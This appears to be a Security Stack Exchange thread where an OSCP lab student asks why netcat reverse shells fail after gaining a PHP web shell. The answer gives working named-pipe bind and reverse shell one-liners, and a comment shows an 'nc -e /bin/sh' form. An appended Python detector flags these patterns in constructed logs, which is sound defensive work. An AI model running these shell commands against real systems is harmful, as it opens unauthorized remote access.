I'm doing my OSCP certification. On one of the lab machines, I'm having a really hard time getting a reverse shell.

I scanned the machine and found port 80 open. I enumerated even more and found an RFI.
I uploaded a PHP web shell and it worked; commands are running as the apache user. Then I enumerated more and found netcat on the machine.

Now I want to have a shell to my attacking box. I tried using netcat as a reverse/bind shell and got nothing.

I tried different ports and nothing is working. When I scan with nmap ports like 6666, 4444, 5555 they are all filtered.

What am I doing wrong?

schroeder
Xozu
  • Doesn't this fall behind the *"Try harder"* motto? – WhiteWinterWolf Oct 04 '16 at 08:59
  • I'm trying harder for two days – Xozu Oct 04 '16 at 09:19
  • what is the netcat command you're using to get the shell? – kaidentity Oct 04 '16 at 09:26
  • Try to get the output of nc -h and check if it has a -e option. Most nc's don't. Then you need to find another way. – kaidentity Oct 04 '16 at 09:39
  • @kaidentity for reverse shell: nc -nv [my ip add] 4444 -e /bin/sh; in my Kali I'm listening with nc -lvp 4444. I can't get the output, I tried it, I just don't get anything :\ – Xozu Oct 04 '16 at 09:41
  • That is what I was suspecting. Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist. Check out my answer (follows in a second). – kaidentity Oct 04 '16 at 09:44
  • Keep things simple. Check what other users are able to access the system. Perhaps they have sudo rights. – Jeroen Oct 04 '16 at 12:09
  • @ShaiAlfasi 2 days is nothing. You need to try harder. What you've done wrong is to discuss the details of the lab outside the lab environment. When I took the OSCP, this would have violated your terms. – schroeder Oct 04 '16 at 20:24

1 Answer

Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist.
The solution is to redirect the stdin/stdout communication through a pipe:

cd /tmp
mknod mypipe p
/bin/bash 0< /tmp/mypipe | nc -nlvp 4444 1> /tmp/mypipe

for a bind shell or

/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe

for a reverse shell. Here is a full article about this.

Recently I found another nc on a Ubuntu 10.04 system where the above nc listener wouldn't have worked since nc didn't allow -l and -p simultaneously. So before panicking because the shell doesn't work you should first try to get the nc help or try to play with the various options (I tend to specify a lot of flags, maybe one should aim for as little as possible).

schroeder
kaidentity
  • Oh, I feel so stupid, I already read that but I ignored it. It works! Thank you a lot! – Xozu Oct 04 '16 at 09:55
  • Wow nice! I have seen this once before, but I didn't know why they were using backpipes. Well explained. I am going to try for my OSCP later this year so this is great to know. The only thing I would ask is please paste some of the content over into your answer from that article so as to keep in line with the stack exchange answer quality policies – DotNetRussell Oct 04 '16 at 13:32
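From the defender's side, the named-pipe trick in the answer (mknod/mkfifo, then a shell reading from the pipe and netcat writing back into it) and the plain nc -e form are both very recognisable in process-execution telemetry. The following is an added example, not code from the post or from anyone in this thread: it scans constructed execve-style events and flags both patterns, corroborating the backpipe case when the same uid created the fifo shortly before. The "<ts> uid=<n> cmd=<argv>" line layout is an assumption made for the example, not a real auditd or EDR format.

```python
import re
from dataclasses import dataclass

# Constructed execve-style events; the "<ts> uid=<n> cmd=<argv>" layout is an
# assumption for this example, not a real auditd or EDR format.
SAMPLE_LOG = """\
1475567920 uid=48 cmd=cd /tmp
1475567921 uid=48 cmd=mknod mypipe p
1475567922 uid=48 cmd=/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe
1475567930 uid=48 cmd=nc -nv 10.0.0.5 4444 -e /bin/sh
1475567940 uid=1000 cmd=nc -z localhost 80
1475567950 uid=1000 cmd=mkfifo /tmp/build.fifo
1475567951 uid=1000 cmd=tar -cf - src | gzip > /tmp/build.tgz
"""

LINE_RE = re.compile(r"^(?P<ts>\d+) uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$")
# netcat asked to hand the connection to a program via -e
NC_EXEC_RE = re.compile(r"\b(nc|ncat|netcat)\b[^|;&]*\s-e\s")
# a shell reading stdin from a path, piped into netcat whose stdout goes back to that same path
BACKPIPE_RE = re.compile(r"0<\s*(?P<fifo>\S+)\s*\|\s*(nc|ncat|netcat)\b.*\s1>\s*(?P=fifo)")
# named-pipe creation (mkfifo, or mknod with type p) used to corroborate the backpipe
FIFO_CREATE_RE = re.compile(r"\b(?:mkfifo\s+(?P<f1>\S+)|mknod\s+(?P<f2>\S+)\s+p)\b")


@dataclass
class Finding:
    ts: int
    uid: int
    rule: str
    cmd: str
    corroborated: bool = False  # True when the same uid created the fifo earlier


def scan(log_text: str) -> list[Finding]:
    """Return findings in log order; fifo creations are remembered per uid."""
    findings: list[Finding] = []
    fifos_by_uid: dict[int, set[str]] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines not in the assumed format
        ts, uid, cmd = int(m["ts"]), int(m["uid"]), m["cmd"]
        fc = FIFO_CREATE_RE.search(cmd)
        if fc:
            path = fc["f1"] or fc["f2"]
            # compare by basename: the pipe is often created relative to an earlier cd
            fifos_by_uid.setdefault(uid, set()).add(path.rsplit("/", 1)[-1])
        bp = BACKPIPE_RE.search(cmd)
        if bp:
            base = bp["fifo"].rsplit("/", 1)[-1]
            findings.append(Finding(ts, uid, "nc-backpipe", cmd,
                                    corroborated=base in fifos_by_uid.get(uid, set())))
        elif NC_EXEC_RE.search(cmd):
            findings.append(Finding(ts, uid, "nc-exec-flag", cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = " (fifo corroborated)" if f.corroborated else ""
        print(f"{f.ts} uid={f.uid} {f.rule}{tag}: {f.cmd}")
```

On the sample, the uid 48 backpipe line is reported with the fifo corroborated by the earlier mknod, the nc -e line is reported on its own, and the uid 1000 lines (a port check, a build fifo and an ordinary pipeline) produce nothing. The basename comparison is deliberate: the answer's own sequence creates the pipe as a relative name after cd /tmp and then refers to it by absolute path.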